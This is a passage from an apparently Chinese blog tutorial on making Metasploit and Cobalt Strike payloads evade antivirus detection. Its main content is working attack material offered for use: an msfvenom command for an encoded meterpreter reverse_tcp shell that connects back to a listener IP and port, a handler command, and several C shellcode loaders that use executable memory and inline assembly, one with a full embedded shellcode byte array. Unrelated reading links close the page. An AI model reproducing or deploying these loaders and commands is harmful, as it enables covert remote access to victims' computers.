基础生成命令
选择A#(即自动模式)选择注入的程序选择是否要用隐身模式(建议不使用,免杀效果会变差)选择自定义字符还是自动字符选择模块#一般是选择1模块设置ip,设置端口监听方法
handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp(监听方法)
4、利用avet实现免杀【带你了解 免杀的小知识】运行
#进入其的目录#然后 Python 其py程序即可一般是直接选择2生成一个payload
四、利用源码编译+加载器加载代码实现免杀方式一
cs+c语言代码组合拳
可参考:
https://blog.csdn.net/qq_33942040/article/details/106463360
方式二,msf+c语言源代码
思路和cs实现免杀的思路差不多,利用编译进行绕过实现的
①首先现在msf中生成shellcode
c语言代码1
msfvenom -pwindows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b 'x00' lhost=10.211.55.2 lport=3333-f c -o shell.c②在c语言代码的buf[]=中添加该shell然后进行编译即可
unsigned char buf[] = "shellcode";#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口main(){( (void(*)(void))&buf)();}c语言代码2
免杀生成出现问题
#include <Windows.h>#include <stdio.h>#include <string.h>#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口unsigned char buf[] = "shellcode";main(){char *Memory;Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);memcpy(Memory, buf, sizeof(buf));((void(*)())Memory)();}
#include<windows.h>#include<stdio.h>unsigned char buf[] ="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52""x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1""x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b""x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03""x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b""x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24""x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb""x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c""x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54""x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x2bx99""x68x02x00x11x5cx89xe6x50x50x50x50x40x50x40x50""x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5""x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67""x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff""xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00""x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56""x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58""x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5""x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85""x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1""xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";size_t size = sizeof(buf);int main(){char *inject;inject = (char*)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);//分配可读可写可执行memcpy(inject, buf, size);//复制大小进去((void(*)())inject)();//执行}c语言代码3
#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){__asm{mov eax, offset shellcodejmp eax}}c语言代码4
#include <windows.h>#include <stdio.h>unsigned char buf[] ="";void main(){((void(WINAPI*)(void))&buf)();}c语言代码5(汇编花指令)
注意:生成的exe文件需要环境中有几个.dll文件才可运行
#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){__asm{mov eax, offset shellcode_emit 0xFF_emit 0xE0}}c语言代码6
base4.c代码
/* Base64 encoder/decoder. Originally Apache file ap_base64.c*/#include <string.h>#include "base64.h"/* aaaack but it's fast and const should make it shared text page. */static const unsigned char pr2six[256] ={/* ASCII table */64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,64,0,1,2,3,4,5,6,7,8,9, 10, 11, 12, 13, 14,15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64};int Base64decode_len(const char *bufcoded){int nbytesdecoded;register const unsigned char *bufin;register int nprbytes;bufin = (const unsigned char *)bufcoded;while (pr2six[*(bufin++)] <= 63);nprbytes = (bufin - (const unsigned char *)bufcoded) - 1;nbytesdecoded = ((nprbytes + 3) / 4) * 3;return nbytesdecoded + 1;}int Base64decode(char *bufplain, const char *bufcoded){int nbytesdecoded;register const unsigned char *bufin;register unsigned char *bufout;register int nprbytes;bufin = (const unsigned char *)bufcoded;while (pr2six[*(bufin++)] <= 63);nprbytes = (bufin - (const unsigned char *)bufcoded) - 1;nbytesdecoded = ((nprbytes + 3) / 4) * 3;bufout = (unsigned char *)bufplain;bufin = (const unsigned char *)bufcoded;while (nprbytes > 4) {*(bufout++) =(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);*(bufout++) =(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);*(bufout++) =(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);bufin += 4;nprbytes -= 4;}/* Note: (nprbytes == 1) would be an error, so just ingore that case */if (nprbytes > 1) {*(bufout++) =(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);}if (nprbytes > 2) {*(bufout++) =(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);}if (nprbytes > 3) {*(bufout++) =(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);}*(bufout++) = '';nbytesdecoded -= (4 - nprbytes) & 3;return nbytesdecoded;}static const char basis_64[] ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";int Base64encode_len(int len){return ((len + 2) / 3 * 4) + 1;}int Base64encode(char *encoded, const char *string, int len){int i;char *p;p = encoded;for (i = 0; i < len - 2; i += 3) {*p++ = basis_64[(string[i] >> 2) & 0x3F];*p++ = basis_64[((string[i] & 0x3) << 4) |((int)(string[i + 1] & 0xF0) >> 4)];*p++ = basis_64[((string[i + 1] & 0xF) << 2) |((int)(string[i + 2] & 0xC0) >> 6)];*p++ = basis_64[string[i + 2] & 0x3F];}if (i < len) {*p++ = basis_64[(string[i] >> 2) & 0x3F];if (i == (len - 1)) {*p++ = basis_64[((string[i] & 0x3) << 4)];//*p++ = '=';}else {*p++ = basis_64[((string[i] & 0x3) << 4) |((int)(string[i + 1] & 0xF0) >> 4)];*p++ = basis_64[((string[i + 1] & 0xF) << 2)];}//*p++ = '=';}*p++ = '';return p - encoded;}
推荐阅读
- 女人闭经危害大 了解闭经的4大诱因
- 卵巢早衰会引起经量减少 经量少的5个原因你应该了解!
- 怎么学习网络安全?这篇文带你从入门级开始学习网络安全
- Nginx 内存池似懂非懂?一文带你看清高性能服务器内存池
- 带你见识一下大厂google的服务器机房管理?
- 小程序开发之前,需要了解哪些费用
- Nginx,一看就会
- 长寿花几月停止修剪,长寿花怎么修剪
- 不仅限于Java 我们必须要了解的Java位运算
- SIP 协议详解